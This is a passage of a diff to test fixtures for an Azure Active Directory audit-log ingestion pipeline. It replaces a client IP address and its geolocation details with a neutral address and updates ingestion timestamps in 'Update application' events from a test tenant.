@@ -16015,12 +14629,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036506900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125282400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -16046,25 +14660,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16078,7 +14674,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16192,7 +14788,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -16204,12 +14800,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036511Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125287500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": 